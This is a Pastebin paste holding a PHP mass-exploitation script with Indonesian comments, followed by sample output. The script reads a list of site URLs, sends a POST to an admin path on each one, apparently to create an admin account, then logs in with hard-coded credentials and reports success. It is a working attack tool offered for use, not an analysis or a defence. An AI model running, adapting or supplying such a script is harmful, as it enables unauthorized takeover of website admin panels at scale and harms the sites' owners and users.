Advertisement
Guest User

Untitled

a guest
Apr 22nd, 2016
67
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.41 KB | None | 0 0
  1. error_reporting(0);
  2. $get=file_get_contents($argv[1])
  3. or die("
  4. ntError !
  5. ntusage => php scan.php list.txtnn");
  6. $j=explode("rn",$get);
  7. foreach($j as $url){
  8.  
  9. print "nnt[+] Exploiting => ".$url;
  10. $dirnya = "/login/secure/adm";
  11.  
  12. $postdata = 'check=blalalalalalal';
  13.  
  14. $ch = curl_init();
  15. curl_setopt ($ch, CURLOPT_URL, $url.$dirnya);
  16. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
  17. curl_setopt ($ch, CURLOPT_TIMEOUT, 60);
  18. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  19. curl_setopt ($ch, CURLOPT_POSTFIELDS, $postdata);
  20. curl_setopt ($ch, CURLOPT_POST, 1);
  21. $headers = array();
  22. $headers[] = 'Accept-Encoding: gzip, deflate';
  23. $headers[] = 'Content-Type: application/x-www-form-urlencoded';
  24.  
  25. curl_setopt ($ch, CURLOPT_HTTPHEADER, $headers);
  26. curl_setopt ($ch, CURLOPT_HEADER, 1);
  27. $result = curl_exec ($ch);
  28. curl_close($ch);
  29.  
  30. #Exploitasi berhasil dan memulai cek Login setelah exploitasi
  31. if(preg_match('#200 OK#', $result)) {
  32. print "nt[+] Exploiting Success, mulai mengecek login..";
  33. $loginpage = $url."/adm";
  34. $logindata = 'key=3ryAIBlm7bJ3naj9&login%5Badm_usr%5D=memek&login%5Badm_pswd%5D=memeklegit';
  35.  
  36. $hydra_ch = curl_init();
  37. curl_setopt ($hydra_ch, CURLOPT_URL, $loginpage);
  38. curl_setopt ($hydra_ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
  39. curl_setopt ($hydra_ch, CURLOPT_TIMEOUT, 60);
  40. curl_setopt ($hydra_ch, CURLOPT_RETURNTRANSFER, 1);
  41. curl_setopt ($hydra_ch, CURLOPT_POSTFIELDS, $logindata);
  42. curl_setopt ($hydra_ch, CURLOPT_POST, 1);
  43.  
  44. $headers = array();
  45. $headers[] = 'Accept-Encoding: gzip, deflate';
  46. $headers[] = 'Content-Type: application/x-www-form-urlencoded';
  47.  
  48. curl_setopt ($hydra_ch, CURLOPT_HTTPHEADER, $headers);
  49. curl_setopt ($hydra_ch, CURLOPT_HEADER, 1);
  50. $hasil = curl_exec ($hydra_ch);
  51. curl_close($hydra_ch);
  52.  
  53.  
  54. if(preg_match('#302 Moved#', $hasil)) {
  55.  
  56. print "nt[+] Login Success ! nt[+] user => memek nt[+] password => memekbau";
  57. print "nt[-] Login Page => ".$loginpage;
  58. }
  59. else {
  60. #Exploitasi berhasil dan namun admin user tidak masuk ke database.
  61. print "nt[-] Login Failed :( ";
  62. print "nt[-] Keterangan : admin user tidak masuk.n";}
  63. }else {
  64.  
  65. #Exploitasi gagal total
  66. print "nt[-] Exploitasi Failed :(n ";}
  67.  
  68. }
  69.  
  70. [+] Exploiting => localhost
  71. [+] Exploiting Success, mulai mengecek login..
  72. [+] Login Success !
  73. [+] user => memek
  74. [+] password => memekbau
  75. [-] Login Page => localhost/adm
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement